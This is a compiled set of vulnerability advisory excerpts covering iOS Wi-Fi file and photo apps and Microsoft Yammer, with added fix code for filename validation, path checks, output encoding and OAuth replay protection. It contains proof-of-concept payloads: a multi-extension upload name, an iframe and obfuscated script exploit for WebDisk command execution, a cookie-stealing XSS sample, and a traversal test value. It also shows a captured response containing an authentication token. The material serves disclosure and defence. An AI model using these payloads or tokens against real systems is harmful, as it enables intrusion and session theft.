<li><a href="http://192.168.2.104:/assets-library---asset/pentester23.PNG.jpg.html.php.js.gif.PNG?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22&ext=PNG"><img src="iPad%20%C3%82%C2%A5337%20360%20%20Photo%20Server%20app%27s%20Web%20Browser%20Interface%20Page_files/pentester23.PNG.jpg.html.php.js.gif.PNG">assets-library---asset/pentester23.PNG.jpg.html.php.js.gif.PNG?id=09FDBC65-D87B-4D3A-A093-EC1CD07D1D22.PNG</a>

Note: After the upload request, the attacker can open the localhost web server again and access the uploaded file in the folder by including its filename.

Solution:
=
1.1 The command/path injection web vulnerability can be patched by securely parsing or encoding the two index locations where the device name is displayed.
1.2 The file include web vulnerability can be patched by securely parsing the POST request when a manipulated file is uploaded. Encode, filter or parse the output listing in the index as well, where the existing file names are displayed.
1.3 Disallow multiple extensions by securely filtering the POST request when a file with multiple extensions is uploaded. Change the web app HTTP server settings and file access rights to prevent the execution of js, html and php files.

Risk:
=
1.1 The security risk of the command/path inject web vulnerability is estimated as high.
1.2 The security risk of the file include web vulnerability is estimated as critical.
1.3 The security risk of the arbitrary file upload vulnerability is estimated as high(+).

Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
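Both this advisory and the Download Lite one above hinge on the multipart filename: a name carrying several extensions, a directory part or markup is stored and then listed verbatim. The following added Python example, not the app's code, implements the filename policy the solution sections describe (drop directory parts, exactly one allowlisted extension, a character allowlist for the stem) and an index listing that encodes stored names for both the href and the text context. ALLOWED_EXT, the regex, the function names and the sample names are assumptions made for the illustration.

```python
import html
import re
from urllib.parse import quote

# Extensions the Photo Server upload form says it accepts (QuickTime, JPEG);
# PNG added because the listing in the advisory shows .PNG assets. Assumption.
ALLOWED_EXT = {"mov", "jpg", "jpeg", "png"}
_STEM_RE = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}")


def sanitize_upload_name(client_name: str) -> str:
    """Return a safe stored name for a multipart filename, or raise ValueError.
    The multipart filename is fully attacker-controlled, so:
    1. drop any directory part (either separator: Windows clients send backslashes);
    2. require exactly one extension, which rejects 'x.PNG.jpg.html.php.js.gif.PNG';
    3. allowlist the lower-cased extension and the characters of the stem,
       which rejects '<', '>', quotes, spaces and control characters."""
    base = client_name.replace("\\", "/").rsplit("/", 1)[-1]
    if base in ("", ".", ".."):
        raise ValueError("empty or traversal filename")
    parts = base.split(".")
    if len(parts) != 2:
        raise ValueError(f"exactly one extension required: {base!r}")
    stem, ext = parts
    ext = ext.lower()
    if ext not in ALLOWED_EXT:
        raise ValueError(f"extension not allowed: {ext!r}")
    if not _STEM_RE.fullmatch(stem):
        raise ValueError(f"bad characters in filename: {stem!r}")
    return f"{stem}.{ext}"


def listing_html(names) -> str:
    """Directory index built from stored names. Each name is encoded twice,
    once for the URL inside href and once as HTML text, so a name that ever
    reached storage unchecked still cannot inject markup into the listing."""
    rows = [f'<a href="{quote(name)}">{html.escape(name)}</a>' for name in names]
    return "<br />\n".join(rows)
```

The server-side settings the advisory mentions (no script execution from the upload directory) remain necessary: the filename policy stops the web-shell upload, while the execution restriction limits the damage if another path into that directory exists.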
iPic Sharp v1.2.1 Wifi iOS - Persistent Foldername Web Vulnerability
!]</a>.jpg" id="img_PhotoSharp_Local_Photo_0" realurl="" class="logoStart" classname="logoStart"></a><span class="spanAlbum" classname="spanAlbum">Default Album</span></div></td><td class="photoTd" classname="photoTd">
<div id="PhotoSharp_Local_Document_0" class="watermarkStart" classname="watermarkStart"><a href="javascript:loadDir('%2Fu%2FPhotoSharp_Local_Document%3FisSystem%3D0','PhotoSharp_Local_Document_0','%2Fu%2FPhotoSharp_Local_Document');"><img src="iPic%20Sharp_files/PhotoSharp_Local_Document_75_75.jpg" id="img_PhotoSharp_Local_Document_0" realurl="" class="logoStart" classname="logoStart"></a><span class="spanAlbum" classname="spanAlbum">[PERSISTENT INJECTED SCRIPT CODE!]</span></div></td>
<td class="photoTd" classname="photoTd"></td><td class="photoTd" classname="photoTd"></td><td class="photoTd" classname="photoTd"></td>
<td class="photoTd" classname="photoTd"></td><td class="photoTd" classname="photoTd"></td><td class="photoTd" classname="photoTd"></td>
<td class="photoTd" classname="photoTd"></td></tr>

Solution:
=
The vulnerability can be patched by securely encoding the folder name input. Encode, filter or parse the affected output at the file directory index listing as well, where the item folder name is displayed.

Risk:
=
The security risk of the persistent input validation web vulnerability is estimated as medium.

Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
WebDisk 3.0.2 PhotoViewer iOS - Command Execution Vulnerability
]
Response Headers:
Content-Length[20217]
Server[MHttpServer/1.0.0]
--- Exploitation Request Session Logs ---

Reference(s):
mHTTP Web-Server
http://localhost:1861/
http://localhost:1861/mjs.js
http://localhost:1861/aadd.htm
http://localhost:1861/afgetthum.ma

PoC Example:
[HOST]:[PORT]/[FILE].[MA]?[PARAM Q]=%5C[PATH VAR]/[DIRECTION]%5C[ID]%5C[DOCUMENTS PATH]%5C[LIBRARY FOLDER]%5C[LOCAL PATH WDisk]%5C[COMMAND EXECUTION]

PoC Link:
http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[COMMAND EXECUTION]

PoC: Exploit 1 - HTML
<html>
<head><body><title>WebDisk v3.0.2 - Command Execution Vulnerability - Remote PoC</title>
<iframe src="http://localhost:1861/afgetthum.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C[COMMAND EXECUTION]" width="800" height="800">
</body></head>
<html>

PoC: Exploit 2 - JS
<script language="JavaScript">m='%3Chtml%3E%0A%3Chead%3E%3Cbody%3E%3Ctitle%3EWebDisk%20v3.0.2%20-%20Command%20Execution%20Vulnerability%20-%20Remote%20PoC%3C/title%3E%0A%3Ciframe%20src%3Dhttp%3A//localhost%3A1861/afgetthum.ma%3Fp%3D%255Cvar%255Cmobile%255CApplications%255C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%255CDocuments%255CLibrary%255CWD%255C%5BCOMMAND%20EXECUTION%5D%20width%3D800%20height%3D800%3E%0A%3C/body%3E%3C/head%3E%0A%3Chtml%3E';d=unescape(m);document.write(d);</script>

Review Source:
<td class="tdmid">
<td colspan="3" height="1"><hr class="spline"></td>
</tr>
<tr>
<td class="tdleft"><a><img class="imgthum" src="afico/files_txt.png"></a></td>
<td class="tdmid">[CODE EXECUTION VULNERABILITY!]</td>
<td class="tdright">7-26 19:51<br/><br/><a href="afdelete.ma?p=%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5C%7C-%7C430429876.txt">delete</a></td>
</tr>
<tr>
<td colspan="3" height="1"><hr class="spline" /></td>
</tr>

Solution:
=
To fix the command execution, parse the p variable and encode the input on direct GET requests. Parse and encode the output listing of the file input in the main file directory index module as well.

Risk:
=
The security risk of the remote command execution web application vulnerability is estimated as critical.

Credits: Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (b...@evolution-sec.com)
All pictures, texts, advisories, source code, videos and other information on this website is trademark of vulnerability-lab team the specific authors or managers. To record, list (feed), modify, use or edit our material contact (ad...@vulnerability-lab.com or resea...@vulnerability-lab.com) to get a permission. Copyright © 2013 | Vulnerability Laboratory [Evolution Security] -- VULNERABILITY LABORATORY RESEARCH TEAM DOMAIN: www.vulnerability-lab.com CONTACT: resea...@vulnerability-lab.com
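The solution above names two fixes: validate the `p` parameter before it reaches the file system, and encode file names when the directory index is rendered. The following is an added example written for this page, not code from the advisory or from WebDisk itself, showing both fixes as plain Node.js functions next to the unencoded listing row the advisory's review source shows. `WD_ROOT`, the function names and the sample entries are assumptions for illustration; the UUID in `WD_ROOT` is the application directory from the PoC link.

```javascript
// Added example (not part of the advisory or of WebDisk's own code): the two fixes the
// solution section describes. WD_ROOT, the function names and the sample entries are
// assumptions for illustration.

// Assumed sandbox root. The UUID is the application directory from the advisory's PoC
// link; a real handler would derive this from the app's own bundle path.
const WD_ROOT =
  '/var/mobile/Applications/8D137E49-3793-4C45-9A50-B8AF3AE7EA56/Documents/Library/WD';

// Collapse "." and ".." segments and duplicate slashes of an absolute POSIX path.
function canonicalize(absPath) {
  const out = [];
  for (const seg of absPath.split('/')) {
    if (seg === '' || seg === '.') continue;
    if (seg === '..') { out.pop(); continue; }   // cannot climb above "/"
    out.push(seg);
  }
  return '/' + out.join('/');
}

// Fix 1: validate the `p` GET parameter instead of passing it straight to the
// file system. Returns the canonical path, or null when the value must be rejected.
function resolveListingPath(rawP) {
  let decoded;
  try {
    decoded = decodeURIComponent(rawP);           // "%5C" becomes "\"
  } catch (e) {
    return null;                                  // malformed percent-encoding
  }
  if (decoded.includes('\0')) return null;        // NUL would truncate a C path
  const unix = decoded.replace(/\\/g, '/');       // the PoC uses backslash separators
  const joined = unix.startsWith('/') ? unix : `${WD_ROOT}/${unix}`;
  const abs = canonicalize(joined);
  // Anything that resolves outside the WebDisk folder ("..\..\", "\etc\passwd") is refused.
  if (abs !== WD_ROOT && !abs.startsWith(WD_ROOT + '/')) return null;
  return abs;
}

// Fix 2: encode file names before they are written into the directory listing.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// The listing row as the advisory's "Review Source" shows it: the file name is
// concatenated into the markup unchanged, so a crafted name becomes active content.
function renderRowUnsafe(entry) {
  return `<tr><td class="tdmid">${entry.name}</td>` +
    `<td class="tdright"><a href="afdelete.ma?p=${entry.path}">delete</a></td></tr>`;
}

// Hardened row: the name is HTML-escaped and the path is URL-encoded for the href.
function renderRowSafe(entry) {
  return `<tr><td class="tdmid">${escapeHtml(entry.name)}</td>` +
    `<td class="tdright"><a href="afdelete.ma?p=${encodeURIComponent(entry.path)}">delete</a></td></tr>`;
}

function renderListing(entries, renderRow = renderRowSafe) {
  return entries.map(renderRow).join('\n');
}

// Constructed sample entries: one benign file and one whose name carries markup.
const SAMPLE_ENTRIES = [
  { name: 'holiday.jpg', path: `${WD_ROOT}/holiday.jpg` },
  { name: '<img src=x onerror=alert(document.cookie)>', path: `${WD_ROOT}/payload.txt` },
];

// Demo: the PoC-style value is accepted only while it stays under WD_ROOT, and the
// crafted name is rendered inertly by the hardened row.
console.log(resolveListingPath(
  '%5Cvar%5Cmobile%5CApplications%5C8D137E49-3793-4C45-9A50-B8AF3AE7EA56%5CDocuments%5CLibrary%5CWD%5Cphotos'));
console.log(resolveListingPath('%5Cetc%5Cpasswd'));
console.log(renderListing(SAMPLE_ENTRIES));
```

The path check canonicalizes before comparing against the root, so `..` segments and absolute paths are caught after decoding rather than by pattern-matching the raw string; the listing fix escapes at the output point, which is where the advisory's review source shows the name being inserted.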
Microsoft Yammer Social Network - oAuth Bypass (Session Token) Vulnerability
..., HEAD, POST, PUT, DELETE, TRACE, CONNECT, PROPFIND, PROPPATCH, MKCOL, COPY, MOVE, LOCK, UNLOCK, VERSION-CONTROL, REPORT, CHECKOUT, CHECKIN, UNCHECKOUT, MKWORKSPACE, UPDATE, LABEL, MERGE, BASELINE-CONTROL, MKACTIVITY, ORDERPATCH, ACL, SEARCH, PATCH
Cache-Control: max-age=0, private, must-revalidate
X-UA-Compatible: IE=Edge,chrome=1
Access-Control-Allow-Headers: Content-Type, X-Requested-With, NETWORK_ID, Authorization, X-CSRF-Token
Access-Control-Allow-Origin: https://ymodules.yammer.com
X-Runtime: 0.444532
X-Date: 1373316697937
Access-Control-Allow-Credentials: true
X-XSS-Protection: 1; mode=block
Content-Length: 70544

<?xml version="1.0" encoding="UTF-8"?>
<response>
  <meta>
    <current-user-id>10490568</current-user-id>
    <direct-from-body>false</direct-from-body>
    <followed-user-ids>
      <followed-user-id>10638646</followed-user-id>
    </followed-user-ids>
    <feed-name>Company Feed</feed-name>
    <realtime>
      <channel-id>MTozNTc3OTc6MzU3Nzk3</channel-id>
      <authentication-token>9mP6fBnFfNlUvZGG0Bwt5nUPJBxmlRqoaG3bMiBsMqJ4nKtWKi1OLVKyMjQwsTQwNbPQUcpLLSnPL8pWsjI2NTe3NNdRSq0oyCyqBCoxNje1tDQ1sDSvBQCsgA8z</authentication-token>
      <uri>https://1-087.rt.yammer.com/cometd/</uri>
    </realtime>
    <feed-desc>jungletorch.com's public messages</feed-desc>
    <older-available>true</older-available>
    <followed-references>
      <followed-reference>
        <type>open_graph_object</type>
        <id>344060296338433</id>
      </followed-reference>
    </followed-references>
    <ymodules/>
    <requested-poll-interval>60</requested-poll-interval>
  </meta>
  <references>
    <reference>
      <type>thread</type>
      <web-url>https://www.yammer.com/jungletorch.com/#/Threads/show?threadId=289043199</web-url>
      <direct-message>false</direct-message>

Connection: keep-alive

Solution:
=
TLS/SSL is the recommended approach to prevent eavesdropping during the data exchange. Search engine bots should be prevented from crawling and indexing URLs that carry sensitive parameters from user sessions. Users should also be notified when an authentication request is performed over plain HTTP rather than HTTPS.

Furthermore, resource providers can limit the likelihood of a replay attack from a tampered request by implementing the protocol's nonce and timestamp attributes. The oauth_nonce attribute is a random value generated uniquely for each signed client request, and oauth_timestamp is the time at which the request was created; the server rejects requests whose timestamp lies outside an acceptable window and only needs to remember the nonces it has seen within that window.

Insecure Storage of Secrets: Protecting the integrity of client credentials and token credentials works fairly well when they are stored on servers. The secrets can be isolated and stored in a database or file system with proper access control, file permissions, physical security and even database or disk encryption. For securing client credentials on mobile application clients, follow security best practices for storing sensitive, non-stale data such as application passwords and secrets.

Risk:
=
The security risk of this insecure OAuth implementation vulnerability is estimated as critical.

Credits:
Vulnerability Laboratory [Research Team] - Ateeq Khan (at...@evolution-sec.com)
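The replay-protection paragraph in the solution describes the server-side check but does not show it. The following is an added example for this page, not Yammer's code, that parses an OAuth 1.0 `Authorization` header and enforces the oauth_timestamp window and oauth_nonce uniqueness per client. The 300-second window, the in-memory store, the header values and the clock value (taken from the X-Date header in the response above, in seconds) are assumptions for illustration; signature verification, which must succeed before this check because it covers both attributes, is not shown.

```javascript
// Added example (not Yammer's code): replay protection with the OAuth 1.0
// oauth_nonce / oauth_timestamp attributes the advisory's solution recommends.
// Window size, the in-memory store and the sample header are assumptions; a real
// deployment would use a shared store so every API node sees the same nonces.

const WINDOW_SECONDS = 300; // assumed: accept requests at most 5 minutes old or early

// Parse `Authorization: OAuth k="v", k2="v2"` into an object; null if not OAuth.
function parseAuthorizationHeader(header) {
  if (typeof header !== 'string' || !/^OAuth\s/i.test(header)) return null;
  const params = {};
  const re = /([a-zA-Z0-9_]+)="([^"]*)"/g;
  let m;
  while ((m = re.exec(header.slice(6))) !== null) {
    params[m[1]] = decodeURIComponent(m[2]);
  }
  return params;
}

class ReplayGuard {
  constructor(windowSeconds = WINDOW_SECONDS) {
    this.window = windowSeconds;
    this.seen = new Map(); // "client\0timestamp\0nonce" -> timestamp
  }

  // Forget nonces older than the window: a replay carrying such a timestamp is
  // rejected as stale anyway, so the store stays bounded.
  prune(now) {
    for (const [key, ts] of this.seen) {
      if (now - ts > this.window) this.seen.delete(key);
    }
  }

  // Returns { ok: true } or { ok: false, reason }.
  check(consumerKey, oauthTimestamp, oauthNonce, now = Math.floor(Date.now() / 1000)) {
    // oauth_timestamp is a positive integer, seconds since the epoch
    if (!/^\d+$/.test(String(oauthTimestamp))) return { ok: false, reason: 'bad_timestamp' };
    const ts = Number(oauthTimestamp);
    this.prune(now);
    if (Math.abs(now - ts) > this.window) return { ok: false, reason: 'stale_timestamp' };
    if (typeof oauthNonce !== 'string' || oauthNonce.length < 8) return { ok: false, reason: 'bad_nonce' };
    // Per RFC 5849 the nonce must be unique for the same client credentials and
    // timestamp, so the key is scoped to the client rather than being global.
    const key = `${consumerKey}\u0000${ts}\u0000${oauthNonce}`;
    if (this.seen.has(key)) return { ok: false, reason: 'replayed_nonce' };
    this.seen.set(key, ts);
    return { ok: true };
  }
}

// Resource-provider side: run after the signature over the request (including
// oauth_timestamp and oauth_nonce) has been verified; that step is assumed here.
function authorize(guard, authorizationHeader, now) {
  const p = parseAuthorizationHeader(authorizationHeader);
  if (!p) return { ok: false, reason: 'not_oauth' };
  return guard.check(p.oauth_consumer_key, p.oauth_timestamp, p.oauth_nonce, now);
}

// Constructed sample request; the clock value is the X-Date of the response above
// in seconds, used here only as a plausible "now".
const SAMPLE_NOW = 1373316700;
const SAMPLE_HEADER =
  'OAuth oauth_consumer_key="example-client", oauth_nonce="c0ffee1234567890", ' +
  'oauth_timestamp="1373316697", oauth_signature_method="HMAC-SHA1", oauth_signature="placeholder"';

// Demo: the first delivery is accepted, an identical re-send one second later is not.
const demoGuard = new ReplayGuard();
console.log(authorize(demoGuard, SAMPLE_HEADER, SAMPLE_NOW));
console.log(authorize(demoGuard, SAMPLE_HEADER, SAMPLE_NOW + 1));
```

Pruning runs before the window check so a replay that arrives after the window has passed is refused by the timestamp rule rather than by the nonce store, which is what allows the store to be bounded to one window's worth of requests.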